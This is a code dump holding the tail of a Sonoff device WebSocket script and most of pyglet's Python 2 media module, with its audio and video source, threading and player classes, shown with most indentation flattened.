ping_interval=ping_interval,
ping_timeout=ping_timeout)
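# Editor's note: illustrative device-originated messages that Sonoff.on_message
# above will handle; the deviceid and states are made-up values.
#
#     {"action": "update", "deviceid": "100000abcd", "params": {"switch": "on"}}
#
# Multi-outlet devices report a "switches" list instead:
#
#     {"action": "update", "deviceid": "100000abcd",
#      "params": {"switches": [{"outlet": 0, "switch": "off"}]}}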
if __name__ == '__main__':
Sonoff()
|
__init__.py
|
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
# $Id$
'''Audio and video playback.
pyglet can play WAV files, and if AVbin is installed, many other audio and
video formats.
Playback is handled by the `Player` class, which reads raw data from `Source`
objects and provides methods for pausing, seeking, adjusting the volume, and
so on. The `Player` class implements the best available audio device
(currently, only OpenAL is supported)::
player = Player()
A `Source` is used to decode arbitrary audio and video files. It is
associated with a single player by "queuing" it::
source = load('background_music.mp3')
player.queue(source)
Use the `Player` to control playback.
If the source contains video, the `Source.video_format` attribute will be
non-None, and the `Player.texture` attribute will contain the current video
image synchronised to the audio.
Decoding sounds can be processor-intensive and may introduce latency,
particularly for short sounds that must be played quickly, such as bullets or
explosions. You can force such sounds to be decoded and retained in memory
rather than streamed from disk by wrapping the source in a `StaticSource`::
bullet_sound = StaticSource(load('bullet.wav'))
The other advantage of a `StaticSource` is that it can be queued on any number
of players, and so played many times simultaneously.
pyglet relies on Python's garbage collector to release resources when a player
has finished playing a source. In this way some operations that could affect
the application performance can be delayed.
The player provides a `Player.delete()` method that can be used to release
resources immediately. Also an explicit call to `gc.collect()` can be used to
collect unused resources.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import atexit
import ctypes
import heapq
import sys
import threading
import time
import warnings
import pyglet
from pyglet.compat import bytes_type, BytesIO
_debug = pyglet.options['debug_media']
class MediaException(Exception):
pass
class MediaFormatException(MediaException):
pass
class CannotSeekException(MediaException):
pass
class MediaThread(object):
'''A thread that cleanly exits on interpreter shutdown, and provides
a sleep method that can be interrupted and a termination method.
:Ivariables:
`condition` : threading.Condition
Lock condition on all instance variables.
`stopped` : bool
True if `stop` has been called.
'''
_threads = set()
_threads_lock = threading.Lock()
def __init__(self, target=None):
self._thread = threading.Thread(target=self._thread_run)
self._thread.setDaemon(True)
if target is not None:
self.run = target
self.condition = threading.Condition()
self.stopped = False
@classmethod
def _atexit(cls):
cls._threads_lock.acquire()
threads = list(cls._threads)
cls._threads_lock.release()
for thread in threads:
thread.stop()
def run(self):
pass
def _thread_run(self):
if pyglet.options['debug_trace']:
pyglet._install_trace()
self._threads_lock.acquire()
self._threads.add(self)
self._threads_lock.release()
self.run()
self._threads_lock.acquire()
self._threads.remove(self)
self._threads_lock.release()
def start(self):
self._thread.start()
def stop(self):
'''Stop the thread and wait for it to terminate.
        The `stopped` instance variable is set to ``True`` and the condition is
        notified.  It is the responsibility of the `run` method to check
        the value of `stopped` after each sleep or wait and to return if set.
'''
if _debug:
print 'MediaThread.stop()'
self.condition.acquire()
self.stopped = True
self.condition.notify()
self.condition.release()
self._thread.join()
def sleep(self, timeout):
'''Wait for some amount of time, or until notified.
:Parameters:
`timeout` : float
Time to wait, in seconds.
'''
if _debug:
print 'MediaThread.sleep(%r)' % timeout
self.condition.acquire()
self.condition.wait(timeout)
self.condition.release()
def notify(self):
'''Interrupt the current sleep operation.
If the thread is currently sleeping, it will be woken immediately,
instead of waiting the full duration of the timeout.
'''
if _debug:
print 'MediaThread.notify()'
self.condition.acquire()
self.condition.notify()
self.condition.release()
atexit.register(MediaThread._atexit)
class WorkerThread(MediaThread):
def __init__(self, target=None):
super(WorkerThread, self).__init__(target)
self._jobs = []
def run(self):
while True:
job = self.get_job()
if not job:
break
job()
def get_job(self):
self.condition.acquire()
while self._empty() and not self.stopped:
self.condition.wait()
if self.stopped:
result = None
else:
result = self._get()
self.condition.release()
return result
def put_job(self, job):
self.condition.acquire()
self._put(job)
self.condition.notify()
self.condition.release()
def clear_jobs(self):
self.condition.acquire()
self._clear()
self.condition.notify()
self.condition.release()
def _empty(self):
return not self._jobs
def _get(self):
return self._jobs.pop(0)
def _put(self, job):
self._jobs.append(job)
def _clear(self):
del self._jobs[:]
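# Illustrative usage sketch, not part of the original pyglet module: shows the
# intended WorkerThread life cycle.  Jobs are arbitrary callables pushed with
# put_job() and executed on the worker thread; stop() wakes the thread and
# joins it.  The function is only defined here, never called at import time.
def _worker_thread_usage_sketch():
    done = threading.Event()
    worker = WorkerThread()
    worker.start()
    worker.put_job(done.set)      # executed on the worker thread
    done.wait(1.0)                # give the job a moment to run
    worker.stop()                 # wake the worker and join it
    return done.is_set()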
class AudioFormat(object):
'''Audio details.
An instance of this class is provided by sources with audio tracks. You
should not modify the fields, as they are used internally to describe the
format of data provided by the source.
:Ivariables:
`channels` : int
The number of channels: 1 for mono or 2 for stereo (pyglet does
not yet support surround-sound sources).
`sample_size` : int
Bits per sample; only 8 or 16 are supported.
`sample_rate` : int
Samples per second (in Hertz).
'''
def __init__(self, channels, sample_size, sample_rate):
self.channels = channels
self.sample_size = sample_size
self.sample_rate = sample_rate
# Convenience
self.bytes_per_sample = (sample_size >> 3) * channels
self.bytes_per_second = self.bytes_per_sample * sample_rate
def __eq__(self, other):
return (self.channels == other.channels and
self.sample_size == other.sample_size and
self.sample_rate == other.sample_rate)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '%s(channels=%d, sample_size=%d, sample_rate=%d)' % (
self.__class__.__name__, self.channels, self.sample_size,
self.sample_rate)
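# Illustrative sketch, not part of the original module: the derived byte rates
# follow directly from the constructor arguments.  The 16-bit stereo 44.1 kHz
# values below are arbitrary example numbers.
def _audio_format_rates_sketch():
    fmt = AudioFormat(channels=2, sample_size=16, sample_rate=44100)
    assert fmt.bytes_per_sample == 4        # (16 >> 3) bytes * 2 channels
    assert fmt.bytes_per_second == 176400   # 4 bytes * 44100 samples/sec
    return fmt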
class VideoFormat(object):
'''Video details.
An instance of this class is provided by sources with a video track. You
should not modify the fields.
Note that the sample aspect has no relation to the aspect ratio of the
video image. For example, a video image of 640x480 with sample aspect 2.0
should be displayed at 1280x480. It is the responsibility of the
application to perform this scaling.
:Ivariables:
`width` : int
Width of video image, in pixels.
`height` : int
Height of video image, in pixels.
`sample_aspect` : float
Aspect ratio (width over height) of a single video pixel.
`frame_rate` : float
Frame rate (frames per second) of the video.
AVbin 8 or later is required, otherwise the frame rate will be
``None``.
**Since:** pyglet 1.2.
'''
def __init__(self, width, height, sample_aspect=1.0):
self.width = width
self.height = height
self.sample_aspect = sample_aspect
self.frame_rate = None
class AudioData(object):
'''A single packet of audio data.
This class is used internally by pyglet.
:Ivariables:
`data` : str or ctypes array or pointer
Sample data.
`length` : int
Size of sample data, in bytes.
`timestamp` : float
Time of the first sample, in seconds.
`duration` : float
Total data duration, in seconds.
`events` : list of MediaEvent
List of events contained within this packet. Events are
timestamped relative to this audio packet.
'''
def __init__(self, data, length, timestamp, duration, events):
self.data = data
self.length = length
self.timestamp = timestamp
self.duration = duration
self.events = events
def consume(self, bytes, audio_format):
'''Remove some data from beginning of packet. All events are
cleared.'''
self.events = ()
if bytes == self.length:
self.data = None
self.length = 0
self.timestamp += self.duration
self.duration = 0.
return
elif bytes == 0:
return
if not isinstance(self.data, str):
# XXX Create a string buffer for the whole packet then
# chop it up. Could do some pointer arith here and
# save a bit of data pushing, but my guess is this is
            # faster than fudging around with ctypes (and easier).
data = ctypes.create_string_buffer(self.length)
ctypes.memmove(data, self.data, self.length)
self.data = data
self.data = self.data[bytes:]
self.length -= bytes
self.duration -= bytes / float(audio_format.bytes_per_second)
self.timestamp += bytes / float(audio_format.bytes_per_second)
def get_string_data(self):
'''Return data as a string. (Python 3: return as bytes)'''
if isinstance(self.data, bytes_type):
return self.data
buf = ctypes.create_string_buffer(self.length)
ctypes.memmove(buf, self.data, self.length)
return buf.raw
class MediaEvent(object):
def __init__(self, timestamp, event, *args):
# Meaning of timestamp is dependent on context; and not seen by
# application.
self.timestamp = timestamp
self.event = event
self.args = args
def _sync_dispatch_to_player(self, player):
pyglet.app.platform_event_loop.post_event(player, self.event, *self.args)
time.sleep(0)
# TODO sync with media.dispatch_events
def __repr__(self):
return '%s(%r, %r, %r)' % (self.__class__.__name__,
self.timestamp, self.event, self.args)
def __lt__(self, other):
return hash(self) < hash(other)
class SourceInfo(object):
'''Source metadata information.
Fields are the empty string or zero if the information is not available.
:Ivariables:
`title` : str
Title
`author` : str
Author
`copyright` : str
Copyright statement
`comment` : str
Comment
`album` : str
Album name
`year` : int
Year
`track` : int
Track number
`genre` : str
Genre
:since: pyglet 1.2
'''
title = ''
author = ''
copyright = ''
comment = ''
album = ''
year = 0
track = 0
genre = ''
class Source(object):
'''An audio and/or video source.
:Ivariables:
`audio_format` : `AudioFormat`
Format of the audio in this source, or None if the source is
silent.
`video_format` : `VideoFormat`
Format of the video in this source, or None if there is no
video.
`info` : `SourceInfo`
Source metadata such as title, artist, etc; or None if the
information is not available.
**Since:** pyglet 1.2
'''
_duration = None
audio_format = None
video_format = None
info = None
def _get_duration(self):
return self._duration
duration = property(lambda self: self._get_duration(),
doc='''The length of the source, in seconds.
Not all source durations can be determined; in this case the value
is None.
Read-only.
:type: float
''')
def play(self):
'''Play the source.
This is a convenience method which creates a Player for
this source and plays it immediately.
:rtype: `Player`
'''
player = Player()
player.queue(self)
player.play()
return player
def get_animation(self):
'''Import all video frames into memory as an `Animation`.
An empty animation will be returned if the source has no video.
Otherwise, the animation will contain all unplayed video frames (the
entire source, if it has not been queued on a player). After creating
the animation, the source will be at EOS.
This method is unsuitable for videos running longer than a
few seconds.
:since: pyglet 1.1
:rtype: `pyglet.image.Animation`
'''
from pyglet.image import Animation, AnimationFrame
if not self.video_format:
return Animation([])
else:
frames = []
last_ts = 0
next_ts = self.get_next_video_timestamp()
while next_ts is not None:
image = self.get_next_video_frame()
if image is not None:
delay = next_ts - last_ts
frames.append(AnimationFrame(image, delay))
last_ts = next_ts
next_ts = self.get_next_video_timestamp()
return Animation(frames)
def get_next_video_timestamp(self):
'''Get the timestamp of the next video frame.
:since: pyglet 1.1
:rtype: float
:return: The next timestamp, or ``None`` if there are no more video
frames.
'''
pass
def get_next_video_frame(self):
'''Get the next video frame.
Video frames may share memory: the previous frame may be invalidated
or corrupted when this method is called unless the application has
made a copy of it.
:since: pyglet 1.1
:rtype: `pyglet.image.AbstractImage`
:return: The next video frame image, or ``None`` if the video frame
could not be decoded or there are no more video frames.
'''
pass
# Internal methods that SourceGroup calls on the source:
def seek(self, timestamp):
'''Seek to given timestamp.'''
raise CannotSeekException()
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
return self
def get_audio_data(self, bytes):
'''Get next packet of audio data.
:Parameters:
`bytes` : int
Maximum number of bytes of data to return.
:rtype: `AudioData`
:return: Next packet of audio data, or None if there is no (more)
data.
'''
return None
class StreamingSource(Source):
'''A source that is decoded as it is being played, and can only be
queued once.
'''
_is_queued = False
is_queued = property(lambda self: self._is_queued,
doc='''Determine if this source has been queued
on a `Player` yet.
Read-only.
:type: bool
''')
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
if self._is_queued:
raise MediaException('This source is already queued on a player.')
self._is_queued = True
return self
class StaticSource(Source):
'''A source that has been completely decoded in memory. This source can
be queued onto multiple players any number of times.
'''
def __init__(self, source):
'''Construct a `StaticSource` for the data in `source`.
:Parameters:
`source` : `Source`
The source to read and decode audio and video data from.
'''
source = source._get_queue_source()
if source.video_format:
raise NotImplementedError(
'Static sources not supported for video yet.')
self.audio_format = source.audio_format
if not self.audio_format:
return
# Arbitrary: number of bytes to request at a time.
buffer_size = 1 << 20 # 1 MB
# Naive implementation. Driver-specific implementations may override
# to load static audio data into device (or at least driver) memory.
data = BytesIO()
while True:
audio_data = source.get_audio_data(buffer_size)
if not audio_data:
break
data.write(audio_data.get_string_data())
self._data = data.getvalue()
self._duration = len(self._data) / \
float(self.audio_format.bytes_per_second)
def _get_queue_source(self):
return StaticMemorySource(self._data, self.audio_format)
def get_audio_data(self, bytes):
raise RuntimeError('StaticSource cannot be queued.')
class StaticMemorySource(StaticSource):
'''Helper class for default implementation of `StaticSource`. Do not use
directly.'''
def __init__(self, data, audio_format):
'''Construct a memory source over the given data buffer.
'''
self._file = BytesIO(data)
self._max_offset = len(data)
self.audio_format = audio_format
self._duration = len(data) / float(audio_format.bytes_per_second)
def seek(self, timestamp):
offset = int(timestamp * self.audio_format.bytes_per_second)
# Align to sample
if self.audio_format.bytes_per_sample == 2:
offset &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
offset &= 0xfffffffc
self._file.seek(offset)
def get_audio_data(self, bytes):
offset = self._file.tell()
timestamp = float(offset) / self.audio_format.bytes_per_second
# Align to sample size
if self.audio_format.bytes_per_sample == 2:
bytes &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
bytes &= 0xfffffffc
data = self._file.read(bytes)
if not len(data):
return None
duration = float(len(data)) / self.audio_format.bytes_per_second
return AudioData(data, len(data), timestamp, duration, [])
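# Illustrative sketch, not part of the original module: StaticMemorySource
# exposes a raw PCM buffer through the Source API.  One second of silent
# 8-bit mono audio is wrapped and read back in packets; the format parameters
# are arbitrary example values.
def _static_memory_source_sketch():
    fmt = AudioFormat(channels=1, sample_size=8, sample_rate=11025)
    silence = b'\x80' * fmt.bytes_per_second      # one second of silence
    source = StaticMemorySource(silence, fmt)
    packets = []
    while True:
        packet = source.get_audio_data(4096)
        if packet is None:
            break
        packets.append(packet)
    return packets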
class SourceGroup(object):
'''Read data from a queue of sources, with support for looping. All
sources must share the same audio format.
:Ivariables:
`audio_format` : `AudioFormat`
Required audio format for queued sources.
'''
# TODO can sources list go empty? what behaviour (ignore or error)?
_advance_after_eos = False
_loop = False
def __init__(self, audio_format, video_format):
self.audio_format = audio_format
self.video_format = video_format
self.duration = 0.
self._timestamp_offset = 0.
self._dequeued_durations = []
self._sources = []
def seek(self, time):
if self._sources:
self._sources[0].seek(time)
def queue(self, source):
source = source._get_queue_source()
assert(source.audio_format == self.audio_format)
self._sources.append(source)
self.duration += source.duration
def has_next(self):
return len(self._sources) > 1
def next_source(self, immediate=True):
if immediate:
self._advance()
else:
self._advance_after_eos = True
#: :deprecated: Use `next_source` instead.
next = next_source # old API, worked badly with 2to3
def get_current_source(self):
if self._sources:
return self._sources[0]
def _advance(self):
if self._sources:
self._timestamp_offset += self._sources[0].duration
self._dequeued_durations.insert(0, self._sources[0].duration)
old_source = self._sources.pop(0)
self.duration -= old_source.duration
def _get_loop(self):
return self._loop
def _set_loop(self, loop):
self._loop = loop
loop = property(_get_loop, _set_loop,
doc='''Loop the current source indefinitely or until
`next` is called. Initially False.
:type: bool
''')
def get_audio_data(self, bytes):
'''Get next audio packet.
:Parameters:
`bytes` : int
Hint for preferred size of audio packet; may be ignored.
:rtype: `AudioData`
:return: Audio data, or None if there is no more data.
'''
data = self._sources[0].get_audio_data(bytes)
eos = False
while not data:
eos = True
if self._loop and not self._advance_after_eos:
self._timestamp_offset += self._sources[0].duration
self._dequeued_durations.insert(0, self._sources[0].duration)
self._sources[0].seek(0)
else:
self._advance_after_eos = False
# Advance source if there's something to advance to.
# Otherwise leave last source paused at EOS.
if len(self._sources) > 1:
self._advance()
else:
return None
data = self._sources[0].get_audio_data(bytes) # TODO method rename
data.timestamp += self._timestamp_offset
if eos:
if _debug:
print 'adding on_eos event to audio data'
data.events.append(MediaEvent(0, 'on_eos'))
return data
def translate_timestamp(self, timestamp):
'''Get source-relative timestamp for the audio player's timestamp.'''
# XXX
if timestamp is None:
return None
timestamp = timestamp - self._timestamp_offset
if timestamp < 0:
for duration in self._dequeued_durations[::-1]:
timestamp += duration
if timestamp > 0:
break
assert timestamp >= 0, 'Timestamp beyond dequeued source memory'
return timestamp
def get_next_video_timestamp(self):
'''Get the timestamp of the next video frame.
:rtype: float
:return: The next timestamp, or ``None`` if there are no more video
frames.
'''
# TODO track current video source independently from audio source for
# better prebuffering.
timestamp = self._sources[0].get_next_video_timestamp()
if timestamp is not None:
timestamp += self._timestamp_offset
return timestamp
def get_next_video_frame(self):
'''Get the next video frame.
Video frames may share memory: the previous frame may be invalidated
or corrupted when this method is called unless the application has
made a copy of it.
:rtype: `pyglet.image.AbstractImage`
:return: The next video frame image, or ``None`` if the video frame
could not be decoded or there are no more video frames.
'''
return self._sources[0].get_next_video_frame()
class AbstractAudioPlayer(object):
'''Base class for driver audio players.
'''
def __init__(self, source_group, player):
'''Create a new audio player.
:Parameters:
`source_group` : `SourceGroup`
Source group to play from.
`player` : `Player`
Player to receive EOS and video frame sync events.
'''
self.source_group = source_group
self.player = player
def play(self):
'''Begin playback.'''
raise NotImplementedError('abstract')
def stop(self):
'''Stop (pause) playback.'''
raise NotImplementedError('abstract')
def delete(self):
'''Stop playing and clean up all resources used by player.'''
raise NotImplementedError('abstract')
def _play_group(self, audio_players):
'''Begin simultaneous playback on a list of audio players.'''
# This should be overridden by subclasses for better synchrony.
for player in audio_players:
player.play()
def _stop_group(self, audio_players):
'''Stop simultaneous playback on a list of audio players.'''
# This should be overridden by subclasses for better synchrony.
for player in audio_players:
            player.stop()
def clear(self):
'''Clear all buffered data and prepare for replacement data.
The player should be stopped before calling this method.
'''
raise NotImplementedError('abstract')
def get_time(self):
'''Return approximation of current playback time within current source.
Returns ``None`` if the audio player does not know what the playback
time is (for example, before any valid audio data has been read).
:rtype: float
:return: current play cursor time, in seconds.
'''
# TODO determine which source within group
raise NotImplementedError('abstract')
def set_volume(self, volume):
'''See `Player.volume`.'''
pass
def set_position(self, position):
'''See `Player.position`.'''
pass
def set_min_distance(self, min_distance):
'''See `Player.min_distance`.'''
pass
def set_max_distance(self, max_distance):
'''See `Player.max_distance`.'''
pass
def set_pitch(self, pitch):
'''See `Player.pitch`.'''
pass
def set_cone_orientation(self, cone_orientation):
'''See `Player.cone_orientation`.'''
pass
def set_cone_inner_angle(self, cone_inner_angle):
'''See `Player.cone_inner_angle`.'''
pass
def set_cone_outer_angle(self, cone_outer_angle):
'''See `Player.cone_outer_angle`.'''
pass
def set_cone_outer_gain(self, cone_outer_gain):
'''See `Player.cone_outer_gain`.'''
pass
class Player(pyglet.event.EventDispatcher):
'''High-level sound and video player.
'''
_last_video_timestamp = None
_texture = None
# Spacialisation attributes, preserved between audio players
_volume = 1.0
_min_distance = 1.0
_max_distance = 100000000.
_position = (0, 0, 0)
_pitch = 1.0
_cone_orientation = (0, 0, 1)
_cone_inner_angle = 360.
_cone_outer_angle = 360.
_cone_outer_gain = 1.
#: The player will pause when it reaches the end of the stream.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_PAUSE = 'pause'
    #: The player will loop the current stream continuously.
#:
#: :deprecated: Use `SourceGroup.loop`
EOS_LOOP = 'loop'
#: The player will move on to the next queued stream when it reaches the
#: end of the current source. If there is no source queued, the player
#: will pause.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_NEXT = 'next'
#: The player will stop entirely; valid only for ManagedSoundPlayer.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_STOP = 'stop'
#: :deprecated:
_eos_action = EOS_NEXT
def __init__(self):
# List of queued source groups
self._groups = []
self._audio_player = None
# Desired play state (not an indication of actual state).
self._playing = False
self._paused_time = 0.0
def queue(self, source):
if isinstance(source, SourceGroup):
self._groups.append(source)
else:
if (self._groups and
source.audio_format == self._groups[-1].audio_format and
source.video_format == self._groups[-1].video_format):
self._groups[-1].queue(source)
else:
group = SourceGroup(source.audio_format, source.video_format)
group.queue(source)
self._groups.append(group)
self._set_eos_action(self._eos_action)
self._set_playing(self._playing)
def _set_playing(self, playing):
#stopping = self._playing and not playing
#starting = not self._playing and playing
self._playing = playing
source = self.source
if playing and source:
if not self._audio_player:
self._create_audio_player()
self._audio_player.play()
if source.video_format:
if not self._texture:
self._create_texture()
if self.source.video_format.frame_rate:
period = 1. / self.source.video_format.frame_rate
else:
period = 1. / 30.
pyglet.clock.schedule_interval(self.update_texture, period)
else:
if self._audio_player:
self._audio_player.stop()
pyglet.clock.unschedule(self.update_texture)
def play(self):
self._set_playing(True)
def pause(self):
self._set_playing(False)
if self._audio_player:
time = self._audio_player.get_time()
time = self._groups[0].translate_timestamp(time)
if time is not None:
self._paused_time = time
self._audio_player.stop()
def delete(self):
self.pause()
if self._audio_player:
self._audio_player.delete()
self._audio_player = None
while self._groups:
del self._groups[0]
def next_source(self):
if not self._groups:
return
group = self._groups[0]
if group.has_next():
group.next_source()
return
if self.source.video_format:
self._texture = None
pyglet.clock.unschedule(self.update_texture)
if self._audio_player:
self._audio_player.delete()
self._audio_player = None
del self._groups[0]
if self._groups:
self._set_playing(self._playing)
return
self._set_playing(False)
self.dispatch_event('on_player_eos')
#: :deprecated: Use `next_source` instead.
next = next_source # old API, worked badly with 2to3
def seek(self, time):
if _debug:
print 'Player.seek(%r)' % time
self._paused_time = time
self.source.seek(time)
if self._audio_player: self._audio_player.clear()
if self.source.video_format:
self._last_video_timestamp = None
self.update_texture(time=time)
def _create_audio_player(self):
assert not self._audio_player
assert self._groups
group = self._groups[0]
audio_format = group.audio_format
if audio_format:
audio_driver = get_audio_driver()
else:
audio_driver = get_silent_audio_driver()
self._audio_player = audio_driver.create_audio_player(group, self)
_class = self.__class__
def _set(name):
private_name = '_' + name
value = getattr(self, private_name)
if value != getattr(_class, private_name):
getattr(self._audio_player, 'set_' + name)(value)
_set('volume')
_set('min_distance')
_set('max_distance')
_set('position')
_set('pitch')
_set('cone_orientation')
_set('cone_inner_angle')
_set('cone_outer_angle')
_set('cone_outer_gain')
def _get_source(self):
if not self._groups:
return None
return self._groups[0].get_current_source()
source = property(_get_source)
playing = property(lambda self: self._playing)
def _get_time(self):
time = None
if self._playing and self._audio_player:
time = self._audio_player.get_time()
time = self._groups[0].translate_timestamp(time)
if time is None:
return self._paused_time
else:
return time
time = property(_get_time)
def _create_texture(self):
video_format = self.source.video_format
self._texture = pyglet.image.Texture.create(
video_format.width, video_format.height, rectangle=True)
self._texture = self._texture.get_transform(flip_y=True)
self._texture.anchor_y = 0
def get_texture(self):
return self._texture
def seek_next_frame(self):
'''Step forwards one video frame in the current Source.
'''
time = self._groups[0].get_next_video_timestamp()
if time is None:
return
self.seek(time)
def update_texture(self, dt=None, time=None):
if time is None:
time = self._audio_player.get_time()
if time is None:
return
if (self._last_video_timestamp is not None and
time <= self._last_video_timestamp):
return
ts = self._groups[0].get_next_video_timestamp()
while ts is not None and ts < time:
self._groups[0].get_next_video_frame() # Discard frame
ts = self._groups[0].get_next_video_timestamp()
if ts is None:
self._last_video_timestamp = None
return
image = self._groups[0].get_next_video_frame()
if image is not None:
if self._texture is None:
self._create_texture()
self._texture.blit_into(image, 0, 0, 0)
self._last_video_timestamp = ts
def _set_eos_action(self, eos_action):
''':deprecated:'''
warnings.warn('Player.eos_action is deprecated in favor of SourceGroup.loop and SourceGroup.advance_after_eos',
category=DeprecationWarning)
assert eos_action in (self.EOS_NEXT, self.EOS_STOP,
self.EOS_PAUSE, self.EOS_LOOP)
self._eos_action = eos_action
for group in self._groups:
group.loop = eos_action == self.EOS_LOOP
group.advance_after_eos = eos_action == self.EOS_NEXT
eos_action = property(lambda self: self._eos_action,
_set_eos_action,
doc='''Set the behaviour of the player when it
reaches the end of the current source.
This must be one of the constants `EOS_NEXT`, `EOS_PAUSE`, `EOS_STOP` or
`EOS_LOOP`.
:deprecated: Use `SourceGroup.loop` and `SourceGroup.advance_after_eos`
:type: str
''')
def _player_property(name, doc=None):
private_name = '_' + name
set_name = 'set_' + name
def _player_property_set(self, value):
setattr(self, private_name, value)
if self._audio_player:
getattr(self._audio_player, set_name)(value)
def _player_property_get(self):
return getattr(self, private_name)
return property(_player_property_get, _player_property_set, doc=doc)
# TODO docstrings for these...
volume = _player_property('volume')
min_distance = _player_property('min_distance')
max_distance = _player_property('max_distance')
position = _player_property('position')
pitch = _player_property('pitch')
cone_orientation = _player_property('cone_orientation')
cone_inner_angle = _player_property('cone_inner_angle')
cone_outer_angle = _player_property('cone_outer_angle')
cone_outer_gain = _player_property('cone_outer_gain')
# Events
def on_player_eos(self):
'''The player ran out of sources.
:event:
'''
if _debug:
print 'Player.on_player_eos'
def on_source_group_eos(self):
'''The current source group ran out of data.
The default behaviour is to advance to the next source group if
possible.
:event:
'''
self.next_source()
if _debug:
print 'Player.on_source_group_eos'
def on_eos(self):
'''
:event:
'''
if _debug:
print 'Player.on_eos'
Player.register_event_type('on_eos')
Player.register_event_type('on_player_eos')
Player.register_event_type('on_source_group_eos')
class ManagedSoundPlayer(Player):
''':deprecated: Use `Player`'''
def __init__(self, *args, **kwargs):
warnings.warn('Use `Player` instead.', category=DeprecationWarning)
super(ManagedSoundPlayer, self).__init__(*args, **kwargs)
class PlayerGroup(object):
'''Group of players that can be played and paused simultaneously.
:Ivariables:
`players` : list of `Player`
Players in this group.
'''
def __init__(self, players):
'''Create a player group for the given set of players.
All players in the group must currently not belong to any other
group.
:Parameters:
`players` : Sequence of `Player`
Players to add to this group.
'''
self.players = list(players)
def play(self):
'''Begin playing all players in the group simultaneously.
'''
audio_players = [p._audio_player \
for p in self.players if p._audio_player]
if audio_players:
audio_players[0]._play_group(audio_players)
for player in self.players:
player.play()
def pause(self):
'''Pause all players in the group simultaneously.
'''
audio_players = [p._audio_player \
for p in self.players if p._audio_player]
if audio_players:
audio_players[0]._stop_group(audio_players)
for player in self.players:
player.pause()
class AbstractAudioDriver(object):
def create_audio_player(self, source_group, player):
raise NotImplementedError('abstract')
def get_listener(self):
raise NotImplementedError('abstract')
class AbstractListener(object):
'''The listener properties for positional audio.
You can obtain the singleton instance of this class by calling
`AbstractAudioDriver.get_listener`.
'''
_volume = 1.0
_position = (0, 0, 0)
_forward_orientation = (0, 0, -1)
_up_orientation = (0, 1, 0)
def _set_volume(self, volume):
raise NotImplementedError('abstract')
volume = property(lambda self: self._volume,
lambda self, volume: self._set_volume(volume),
doc='''The master volume for sound playback.
All sound volumes are multiplied by this master volume before being
played. A value of 0 will silence playback (but still consume
resources). The nominal volume is 1.0.
:type: float
''')
def _set_position(self, position):
raise NotImplementedError('abstract')
position = property(lambda self: self._position,
lambda self, position: self._set_position(position),
doc='''The position of the listener in 3D space.
The position is given as a tuple of floats (x, y, z). The unit
defaults to meters, but can be modified with the listener
properties.
:type: 3-tuple of float
''')
def _set_forward_orientation(self, orientation):
raise NotImplementedError('abstract')
forward_orientation = property(lambda self: self._forward_orientation,
lambda self, o: self._set_forward_orientation(o),
doc='''A vector giving the direction the
listener is facing.
The orientation is given as a tuple of floats (x, y, z), and has
        no unit.  The forward orientation should be orthogonal to the
up orientation.
:type: 3-tuple of float
''')
def _set_up_orientation(self, orientation):
raise NotImplementedError('abstract')
up_orientation = property(lambda self: self._up_orientation,
lambda self, o: self._set_up_orientation(o),
doc='''A vector giving the "up" orientation
of the listener.
The orientation is given as a tuple of floats (x, y, z), and has
        no unit.  The up orientation should be orthogonal to the
forward orientation.
:type: 3-tuple of float
''')
class _LegacyListener(AbstractListener):
def _set_volume(self, volume):
get_audio_driver().get_listener().volume = volume
self._volume = volume
def _set_position(self, position):
get_audio_driver().get_listener().position = position
self._position = position
def _set_forward_orientation(self, forward_orientation):
get_audio_driver().get_listener().forward_orientation = \
forward_orientation
self._forward_orientation = forward_orientation
def _set_up_orientation(self, up_orientation):
get_audio_driver().get_listener().up_orientation = up_orientation
self._up_orientation = up_orientation
#: The singleton `AbstractListener` object.
#:
#: :deprecated: Use `AbstractAudioDriver.get_listener`
#:
#: :type: `AbstractListener`
listener = _LegacyListener()
class AbstractSourceLoader(object):
def load(self, filename, file):
raise NotImplementedError('abstract')
class AVbinSourceLoader(AbstractSourceLoader):
def load(self, filename, file):
import avbin
return avbin.AVbinSource(filename, file)
class RIFFSourceLoader(AbstractSourceLoader):
def load(self, filename, file):
import riff
return riff.WaveSource(filename, file)
def load(filename, file=None, streaming=True):
'''Load a source from a file.
Currently the `file` argument is not supported; media files must exist
as real paths.
:Parameters:
`filename` : str
Filename of the media file to load.
`file` : file-like object
Not yet supported.
